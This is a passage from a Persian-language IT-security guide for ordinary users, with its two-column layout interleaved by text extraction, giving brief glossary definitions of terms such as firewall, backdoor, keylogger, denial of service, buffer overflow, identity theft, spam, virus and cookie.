‫ﺻﺎﺣﺐ ﺁﻥ ﺍﺳـﺖ‪ .‬ﺍﮔـﺮ ﺩﺭﺏ ﻣﺨﻔـﻲ ﺭﻭﻱ ﻳـﻚ ﺭﺍﻳﺎﻧـﺔ‬
‫ﺿﻤﻴﻤﺔ ‪۳‬‬
‫ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﻧﺼﺐ ﺷﻮﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺮ ﺷﺨﺼﻲ ﺩﺭ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺑﺘﻮﺍﻧﺪ ﺑﺪﻭﻥ ﺍﻃﻼﻉ ﻭ ﺭﺿﺎﻳﺖ ﻣﺎﻟـﻚ ﺭﺍﻳﺎﻧـﻪ ﺑـﻪ‬ ‫ﻭﺍﮊﻩﻧﺎﻣﺔ ﺍﺻﻄﻼﺣﺎﺕ ﻓﻨﻲ‬
‫ﺁﻥ ﻭﺍﺭﺩ ﺷﻮﺩ ﻭ ﻛﻨﺘﺮﻝ ﺁﻧﺮﺍ ﺑﺪﺳﺖ ﮔﻴﺮﺩ‪.‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﺗﻌﺎﺭﻳﻒ ﺍﺻﻄﻼﺣﺎﺕ ﺩﺭ ﺣﻮﺯﺓ ﻣﺘﻮﻥ ﺍﻣﻨﻴﺘﻲ‬


‫‪١٦٤‬‬
‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ‬ ‫‪١٦٠‬‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣـﻲ ﺗﻮﺍﻧـﺪ ﺗﺒـﺎﺩﻝ ﻏﻴﺮﻣﻨﺘﻈـﺮﻩ ﻭ ﻏﻴﺮﻣﺠـﺎﺯ‬
‫ﻣﻌﺎﺩﻝ ﺭﺍﻳﺎﻧﻪﺍﻱ ﭘﺴﺖ ﻧﺎﻣـﻪﻫـﺎ‪ .‬ﺁﺩﺭﺳـﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﺷﻤﺎ ﻭ ﺩﻧﻴﺎﻱ ﺧﺎﺭﺝ ﺍﺯ ﺁﻧﺮﺍ ﻣـﺴﺪﻭﺩ ﻛﻨـﺪ‪.‬‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﻧﺎﻣﻪ ﺍﺭﺳﺎﻝ ﻳﺎ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻨﺪ‪.‬‬
‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺩﻭ ﻧﻮﻉ ﻫﺴﺘﻨﺪ‪ :‬ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺗﻤﺎﻣﻲ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﻣﺘﻮﻥ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺑﺎﺷﺪ ﻛﻪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺟـﺮﺍ ﻣـﻲﺷـﻮﺩ ﻳـﺎ‬
‫ﻗﺎﺑــﻞ ﭼــﺎﭖ )ﻛﺎﺭﺍﻛﺘﺮﻫــﺎﻱ ﻏﻴﺮﻛﻨﺘﺮﻟــﻲ ‪ (ASCII‬ﺗــﺸﻜﻴﻞ‬
‫ﻗﻄﻌﺔ ﺳﺨﺖ ﺍﻓﺰﺍﺭﻱ ﻣﺠﺰﺍﻳﻲ ﺑﺎﺷﺪ ﻛﻪ ﺑﻪ ﺁﻧﭽﻪ ﺩﺭ ﺷﺒﻜﻪ‬
‫ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺩﺭﻳﺎﻓﺖ ﻭ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﺩ ﻧﻈﺎﺭﻩ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪١٦١‬‬
‫‪١٦٥‬‬ ‫ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ‬
‫ﺣﻤﻠﺔ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺯﻣﺎﻧﻲ ﺍﺗﻔﺎﻕ ﻣﻲ ﺍﻓﺘﺪ ﻛـﻪ ﺭﺍﻳﺎﻧـﻪ‬
‫ﺭﻭﺷﻲ ﺑﺮﺍﻱ ﻣﺨﻔﻲ ﻛﺮﺩﻥ ﻣﺤﺘﻮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﻛﻪ ﺑﺎﻋـﺚ‬
‫ﻣﺘﺼﻞ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺗﻮﺳﻂ ﭘﻴﺎﻣﻬـﺎﻱ ﺑـﺴﻴﺎﺭ ﺯﻳـﺎﺩ ﻭ ﻏﻴـﺮ‬
‫ﻣﻲﮔﺮﺩﺩ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﺣﺘﻲ ﻗﺎﺑﻞ ﺧﻮﺍﻧـﺪﻥ ﻧﺒﺎﺷـﻨﺪ‪ ،‬ﻣﮕـﺮ‬
‫ﺣﻘﻴﻘﻲ ﺑﻤﺒﺎﺭﺍﻥ ﺷـﻮﺩ؛ ﺑﻄﻮﺭﻳﻜـﻪ ﺗﻤـﺎﻣﻲ ﻭﻗـﺖ ﺧـﻮﺩ ﺭﺍ‬
‫ﺑﺮﺍﻱ ﻛﺴﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨـﺪ‪.‬‬
‫ﺻﺮﻑ ﭘﺎﺳﺦ ﺩﺍﺩﻥ ﺑﻪ ﺍﻳﻦ ﭘﻴﺎﻣﻬﺎ ﻧﻤﺎﻳﺪ ﻭ ﻣﺠـﺎﻟﻲ ﺑـﺮﺍﻱ‬
‫ﺩﺭ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻳـﻚ "ﻛﻠﻴـﺪ" ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺑـﺮ ﺍﺳـﺎﺱ‬
‫ﻋﺒﻮﺭ ﺗﺮﺍﻓﻴﻚ ﻛﺎﺭﺑﺮ ﻭﺍﻗﻌﻲ ﺑﺎﻗﻲ ﻧﻤﺎﻧﺪ‪.‬‬
‫ﻳﻜﺴﺮﻱ ﻗﻮﺍﻧﻴﻦ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ ﻭ ﺑﺮﺍﻱ ﺗﻐﻴﻴﺮ ﻇﺎﻫﺮﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣـﻲﮔﻴـﺮﺩ‪ .‬ﺍﻳـﻦ ﺍﻃﻼﻋـﺎﺕ‬ ‫‪١٦٢‬‬
‫ﺛﺒﺖﻛﻨﻨﺪﻩﻫﺎﻱ ﻛﻠﻴﺪ‬
‫ﺯﻣﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺧﻮﺍﻧﺪﻩ ﺷﻮﺩ ﻛﻪ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺷﺪﻩ ﺑﺎﺷـﺪ ﻭ‬
‫ﺑﺮﻧﺎﻣــﻪﺍﻱ ﻛــﻪ ﻫﺮﺁﻧﭽــﻪ ﺍﺯ ﻃﺮﻳــﻖ ﺻــﻔﺤﻪﻛﻠﻴــﺪ ﺗﺎﻳــﭗ‬
‫ﺑﺮﺍﻱ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺁﻥ ﻻﺯﻡ ﺍﺳﺖ ﻓﺮﺩ ﺩﺭﻳﺎﻓﺖﻛﻨﻨـﺪﻩ‪ ،‬ﻫـﻢ‬
‫ﻣﻲﺷﻮﺩ ﺭﺍ ﺛﺒﺖ ﻣﻲﻛﻨﺪ‪ .‬ﺩﺍﺩﻩﻫﺎ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺭﻭﻱ ﺩﻳـﺴﻚ‬
‫ﻛﻠﻴﺪ ﻭ ﻫﻢ ﺭﻭﺵ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﺮﺍ ﺑﺪﺍﻧﺪ‪.‬‬
‫ﻧﻮﺷﺘﻪ ﻭ ﻳﺎ ﺍﺯ ﻃﺮﻳـﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺮﺍﻱ ﺷـﺨﺺ ﺩﻳﮕـﺮﻱ‬
‫‪١٦٦‬‬
‫ﺳﺮﺭﻳﺰﻱ ﺑﺎﻓﺮ‬ ‫ﺍﺭﺳﺎﻝ ﮔﺮﺩﻧﺪ‪ .‬ﺍﮔﺮ ﺛﺒـﺖﻛﻨﻨـﺪﻩﻫـﺎﻱ ﺻـﻔﺤﻪﻛﻠﻴـﺪ ﺭﻭﻱ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﺼﺐ ﺷﺪﻩ ﺑﺎﺷﻨﺪ‪ ،‬ﻫﺮﺁﻧﭽﻪ ﻛﻪ ﻭﺍﺭﺩ ﺭﺍﻳﺎﻧﻪ ﮔﺮﺩﺩ‬
‫ﻳﻚ ﺍﺷﻜﺎﻝ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺍﺳﺖ ﻭ ﻫﻨﮕﺎﻣﻲ ﺍﺗﻔﺎﻕ ﻣـﻲﺍﻓﺘـﺪ‬
‫‪ -‬ﻣﺜﻞ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ‪ -‬ﺛﺒﺖ ﻣﻲﺷـﻮﺩ؛ ﺩﻗﻴﻘـﹰﺎ‬
‫ﻛﻪ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑـﻪ ﻓـﻀﺎﻳﻲ ﺩﺭ ﺣﺎﻓﻈـﻪ‬
‫ﻣﺸﺎﺑﻪ ﺣﺎﻟﺘﻲ ﻛﻪ ﺷﻤﺎ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺧـﻮﺩ ﺭﺍ‬
‫ﻣﻨﺘﻘﻞ ﻣﻲﻛﻨﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﺟﺎﻱ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﺩﺍﺩﻩﻫﺎ ﻭﺟـﻮﺩ‬
‫ﻭﺍﺭﺩ ﻣﻲﻛﻨﻴﺪ ﻭ ﺷﺨﺼﻲ ﺑﺎﻻﻱ ﺳﺮﺗﺎﻥ ﺍﻳﺴﺘﺎﺩﻩ ﺍﺳﺖ!‬
‫ﻧﺪﺍﺭﺩ‪ .‬ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺑﺮﻧﺎﻣﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺩﻩﻫﺎﻱ ﻗﺒﻠـﻲ ﺭﺍ‬
‫ﺍﺯ ﺣﺎﻓﻈﻪ ﺑﻴﺮﻭﻥ ﺑﻴﺎﻧﺪﺍﺯﺩ ﻭ ﺳﻌﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻓـﻀﺎﻳﻲ ﺭﺍ‬
‫ﺑﺮﺍﻱ ﺩﺍﺩﻩﻫﺎﻱ ﺟﺪﻳﺪ ﻣﻬﻴﺎ ﺳﺎﺯﺩ‪.‬‬

‫‪163‬‬ ‫‪Backdoor‬‬ ‫‪160 Email‬‬


‫‪164‬‬ ‫‪Firewall‬‬ ‫‪161 Denial of Service‬‬
‫‪165‬‬ ‫‪Encryption‬‬ ‫‪162 Keyloggers‬‬
‫‪166‬‬ ‫‪Buffer Overflow‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١١٦‬‬

‫ﻫﺴﺘﻨﺪ‪ ،‬ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺘﻦ ﺑﺎﺯ ‪ -‬ﭼـﻪ ﺁﻧﻬـﺎﻳﻲ‬ ‫ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺍﻳﺠﺎﺩ ﻣـﺸﻜﻼﺕ‬
‫ﻛﻪ ﺭﺍﻳﮕـﺎﻥ ﻫـﺴﺘﻨﺪ ﻭ ﭼـﻪ ﺁﻧﻬـﺎﻳﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﻓـﺮﻭﺵ‬ ‫ﻻ ﻳﻜﭙـﺎﺭﭼﮕﻲ ﻭ ﺍﻣﻨﻴـﺖ ﺑﺮﻧﺎﻣـﻪ ﺭﺍ‬
‫ﺯﻳﺎﺩﻱ ﮔﺮﺩﺩ ﻭ ﻣﻌﻤـﻮ ﹰ‬
‫ﻣﻲﺑﺎﺷﻨﺪ ‪ -‬ﻗﺎﺑﻠﻴﺘﻬﺎﻳﻲ ﺩﺍﺭﻧﺪ ﻛـﻪ ﻣـﺸﺎﺑﻪ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ‬ ‫ﺧﺪﺷﻪﺩﺍﺭ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺎ ﺑﺮﺭﺳﻲ ﻓﻀﺎﻱ ﻛﺎﻓﻲ ﺣﺎﻓﻈﻪ ﻗﺒﻞ ﺍﺯ‬
‫ﺍﻧﺤﺼﺎﺭﻱ ﺍﺳﺖ ﻭ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻫﺰﻳﻨـﺔ ﺑـﺎﻻﻳﻲ ﺩﺍﺷـﺘﻪ‬ ‫ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﺁﻥ ﻣﻲ ﺗـﻮﺍﻥ ﺍﺯ ﻭﻗـﻮﻉ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ‬
‫ﺑﺎﺷــﺪ‪ .‬ﮔــﺎﻫﻲ ﺍﻭﻗــﺎﺕ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ ﻣــﺘﻦﺑــﺎﺯ ﺗﺤــﺖ‬ ‫ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ‪.‬‬
‫ﻣﻮﺍﻓﻘﺘﻨﺎﻣﻪﻫﺎ ﻭ ﻣﺠﻮﺯﻫﺎﻱ ﺧﺎﺹ ﺑﺼﻮﺭﺕ ﻏﻴﺮ ﺭﺍﻳﮕﺎﻥ ﺩﺭ‬ ‫‪١٦٧‬‬
‫ﺳﺮﻗﺖ ﻫﻮﻳﺖ‬
‫ﻗﺴﻤﺘﻬﺎﻳﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺳــﺮﻗﺖ ﻫﻮﻳــﺖ ﺯﻣــﺎﻧﻲ ﺍﺗﻔــﺎﻕ ﻣــﻲﺍﻓﺘــﺪ ﻛــﻪ ﺷــﺨﺺ‬
‫ﺑﺮﺍﻱ ﺍﻃﻼﻋـﺎﺕ ﺑﻴـﺸﺘﺮ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ‬
‫ﺍﻃﻼﻋﺎﺕ ﻛﺎﻓﻲ ﺩﺭ ﻣﻮﺭﺩ ﺷﻤﺎ ﺟﻤﻊﺁﻭﺭﻱ ﻛـﺮﺩﻩ ﺑﺎﺷـﺪ ﻭ‬
‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻧﻤﺎﻳﻴﺪ‪:‬‬
‫ﺑﺎ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺘﻮﺍﻧﺪ ﺧﻮﺩ ﺭﺍ ﺑﺠﺎﻱ ﺷﻤﺎ ﺟﺎ ﺑﺰﻧﺪ )ﻣﺜ ﹰ‬
‫ﻼ ﺩﺭ‬
‫‪http://www.fsf.org‬‬
‫ﺑﺎﻧﻜﻬﺎ‪ ،‬ﻓﺮﻭﺷﮕﺎﻫﻬﺎ‪ ،‬ﻳﺎ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ(‪.‬‬
‫‪http://www.opensource.org‬‬
‫‪١٦٨‬‬
‫‪١٧١‬‬ ‫ﺿﻤﻴﻤﻪ‬
‫ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ‬
‫ﺿﻤﻴﻤﻪ ﻗﺴﻤﺘﻲ ﺍﺯ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻓﺮﺁﻳﻨﺪ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﻣﺤﻠﻬـﺎﻱ‬
‫ﺍﺯ ﺁﻥ ﻣﻲﺗﻮﺍﻥ ﺍﻧﻮﺍﻉ ﻓﺎﻳﻠﻬﺎ ﻣﺜﻞ ﻓﺎﻳﻠﻬﺎﻱ ﻣـﺘﻦ ﻭ ﺗـﺼﻮﻳﺮ‬
‫ﺩﻳﮕﺮ ﺩﺭ ﻫﻤﺎﻥ ﺭﺍﻳﺎﻧﻪ ﻭ ﻳـﺎ ﺭﻭﻱ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺟـﺎﻧﺒﻲ ﻛـﻪ‬
‫ﺭﺍ ﺍﻧﺘﻘﺎﻝ ﺩﺍﺩ‪ .‬ﺗﻤﺎﻣﻲ ﻓﺎﻳﻠﻬﺎﻱ ﻏﻴﺮ ﻣﺘﻨﻲ ﺑﺮﺍﻱ ﺍﺭﺳﺎﻝ ﺑﺎﻳﺪ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺴﺘﻘﻞ ﺍﺯ ﺁﻥ ﺭﺍﻳﺎﻧـﻪ ﺑﺎﺷـﻨﺪ‪ .‬ﻧـﺴﺨﻪ ﻫـﺎﻱ‬
‫ﺑﺼﻮﺭﺕ ﻗﺎﺑﻞ ﭼﺎﭖ )ﻣﺘﻦﺳﺎﺩﻩ( ﺩﺭﺁﻳﻨﺪ‪ .‬ﺗﻤﺎﻣﻲ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎﻋﺚ ﻣﻲﺷﻮﻧﺪ ﺑﺘﻮﺍﻧﻴﺪ ﺩﺍﺩﻩﻫـﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﻫـﺮ‬
‫ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﺩ ﺗﺮﻛﻴﺒﻲ ﺍﺯ ﺍﺭﻗـﺎﻡ ‪ ۰‬ﻭ ‪ ۱‬ﺍﺳـﺖ‪ .‬ﺑـﻪ‬
‫ﻼ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﭘﺎﻙ ﺷﺪﻩﺍﻧﺪ‪ ،‬ﺁﺳـﻴﺐ‬ ‫ﺩﻟﻴﻠﻲ ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻪﺍﻧﺪ )ﻣﺜ ﹰ‬
‫ﺯﺑﺎﻥ ﺳﺎﺩﻩﺗﺮ ﻛﺪﮔﺬﺍﺭﻱ ﺍﻳﻦ ﺻﻔﺮﻫﺎ ﻭ ﻳﻚﻫﺎ ﺭﺍ ﺑﺎ ﺗﺒﺪﻳﻞ‬
‫ﻓﻴﺰﻳﻜﻲ ﺩﻳﺪﻩﺍﻧﺪ‪ ،‬ﻭ ﻳﺎ ﻣﻮﺭﺩ ﺳـﺮﻗﺖ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪﺍﻧـﺪ( ﺭﺍ ﺑﺎﺯﻳـﺎﺑﻲ‬
‫ﺑﻪ ﻣﺘﻮﻥ ﺳﺎﺩﻩ‪ ،‬ﻗﺎﺑﻞ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫‪١٦٩‬‬
‫‪١٧٢‬‬ ‫ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ‬
‫ﻫﺮﺯﻧﺎﻣﻪ‬
‫ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﺤﺮﻣﺎﻧﻪ ﻛﻪ ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﺮﺍﻱ ﻳـﻚ‬
‫ﺗﺒﻠﻴﻐﺎﺕ ﻭ ﺩﻳﮕﺮ ﻧﺎﻣﻪ ﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﺑـﺪﻭﻥ ﺍﻳﻨﻜـﻪ‬
‫ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﻳﺎ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ ﺗـﺼﺪﻳﻖ‬
‫ﺷﻤﺎ ﺧﻮﺍﺳﺘﻪ ﺑﺎﺷﻴﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﻫﻮﻳﺖ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪١٧٣‬‬
‫ﻭﻳﺮﻭﺱ‬ ‫‪١٧٠‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻦﺑﺎﺯ‬
‫ﺍﺻﻄﻼﺡ "ﻭﻳﺮﻭﺱ" ﻣﻌﻨﺎﻱ ﺧﺎﺻﻲ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﺑﺨـﺸﻬﺎﻱ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺁﻧﻬﺎ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻋﻤﻮﻡ ﺍﺳـﺖ‬
‫ﺁﺗﻲ ﺑﻴﺸﺘﺮ ﻣﻮﺭﺩ ﺑﺤﺚ ﻭ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲ ﮔﻴـﺮﺩ‪ .‬ﺩﺭﺣـﺎﻝ‬
‫ﻭ ﻫﻤﻪ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺁﺯﺍﺩﺍﻧﻪ ﺁﻧﻬـﺎ ﺭﺍ ﺍﺻـﻼﺡ ﻛﻨﻨـﺪ ﻭ ﺗﻐﻴﻴـﺮ‬
‫ﺣﺎﺿﺮ ﻭﻳﺮﻭﺱ ﺑﻪ ﻣﺠﻤﻮﻋﺔ ﻫﻤـﺔ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﺍﻃـﻼﻕ‬
‫ﺩﻫﻨﺪ‪ .‬ﺑﻪ ﺩﻟﻴﻞ ﺩﺭ ﺩﺳـﺘﺮﺱ ﺑـﻮﺩﻥ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﻪ‪ ،‬ﺍﻓـﺮﺍﺩ‬
‫ﻣﻲﮔﺮﺩﺩ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺷـﻤﺎ ﻇـﺎﻫﺮ ﻣـﻲﺷـﻮﻧﺪ ﻭ ﻣﻤﻜـﻦ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﺤﻮﺓ ﻋﻤﻠﻜﺮﺩ ﺁﻧﺮﺍ ﺑﺒﻴﻨﻨـﺪ ﻭ ﺑـﻪ ﺩﻟﺨـﻮﺍﻩ ﺧـﻮﺩ‬
‫ﺍﺳﺖ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻧﻴـﺰ ﺳـﺮﺍﻳﺖ ﻛﻨﻨـﺪ ﻭ ﺑـﻪ ﺁﻧﻬـﺎ‬
‫ﻻ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﻣﺘﻦﺑﺎﺯ ﺳﺎﻳﺮ‬ ‫ﺗﻐﻴﻴﺮ ﺩﻫﻨﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﺁﺳﻴﺒﻬﺎﻱ ﺟﺪﻱ ﻭﺍﺭﺩ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺑﺮﻧﺎﻣــﻪﻧﻮﻳــﺴﺎﻥ ﺭﺍ ﺗــﺸﻮﻳﻖ ﺑــﻪ ﻣــﺸﺎﺭﻛﺖ ﺩﺭ ﺗﻮﺳــﻌﻪ ﻭ‬
‫ﮔﺴﺘﺮﺵ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﻲﻧﻤﺎﻳﻨﺪ‪ .‬ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ‬
‫ﻣﺘﻦﺑـﺎﺯ ﻫﻤﭽﻨـﻴﻦ ﺷـﺎﻣﻞ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺭﺍﻳﮕـﺎﻥ ﻫـﻢ‬

‫‪167‬‬ ‫‪Identity Theft‬‬


‫‪171 Backup‬‬ ‫‪168‬‬ ‫‪Attachment‬‬
‫‪172 Spam‬‬ ‫‪169‬‬ ‫‪Username & Password‬‬
‫‪173 Virus‬‬ ‫‪170‬‬ ‫‪Open-Source Software‬‬
‫‪١١٧‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫‪١٧٤‬‬
‫‪URL‬‬ ‫‪Cookie‬‬

‫ﻳﻚ ﺁﺩﺭﺱ ﻋﻤـﻮﻣﻲ ﺑـﺮﺍﻱ ﺍﺷـﺎﺭﻩ ﺑـﻪ ﻳـﻚ ﻣﻘـﺼﺪ ﺩﺭ‬ ‫ﻓﺎﻳﻠﻲ ﺍﺳﺖ ﻛﻪ ﻫﻨﮕﺎﻡ ﺩﺭﺧﻮﺍﺳﺖ ﻳﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺍﺯ ﺭﺍﻩ‬
‫ﺍﻳﻨﺘﺮﻧﺖ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ‪http://www.infodev.org/‬‬ ‫ﺩﻭﺭ‪ ،‬ﺭﻭﻱ ﺩﻳﺴﻚ ﺳﺨﺖ ﻧﻮﺷﺘﻪ ﻭ ﻳﺎ ﺍﺯ ﺭﻭﻱ ﺁﻥ ﺧﻮﺍﻧﺪﻩ‬
‫ﻳﺎ ‪mailto: info@worldbank.org‬‬ ‫ﻣﻲﺷﻮﺩ‪ .‬ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺭﺧﻮﺍﺳﺖ ﻣﻲﻛﻨـﺪ ﻛـﻪ ﻓﺎﻳـﻞ ﺭﻭﻱ‬
‫ﺭﺍﻳﺎﻧﺔ ﻣﻮﺭﺩ ﻧﻈﺮ ﻧﻮﺷﺘﻪ ﺷﻮﺩ ﺗـﺎ ﺑﻌـﺪﻫﺎ ﻫـﻢ ﺑﺘﻮﺍﻧـﺪ ﺁﻧـﺮﺍ‬
‫ﻼ ﺍﮔــﺮ ﭘﺎﻳﮕــﺎﻩ ﻭﺑــﻲ ﺍﺯ ﺷــﻤﺎ ﻧــﺎﻡ ﻛــﺎﺭﺑﺮﻱ‬
‫ﺑﺨﻮﺍﻧــﺪ‪ .‬ﻣــﺜ ﹰ‬
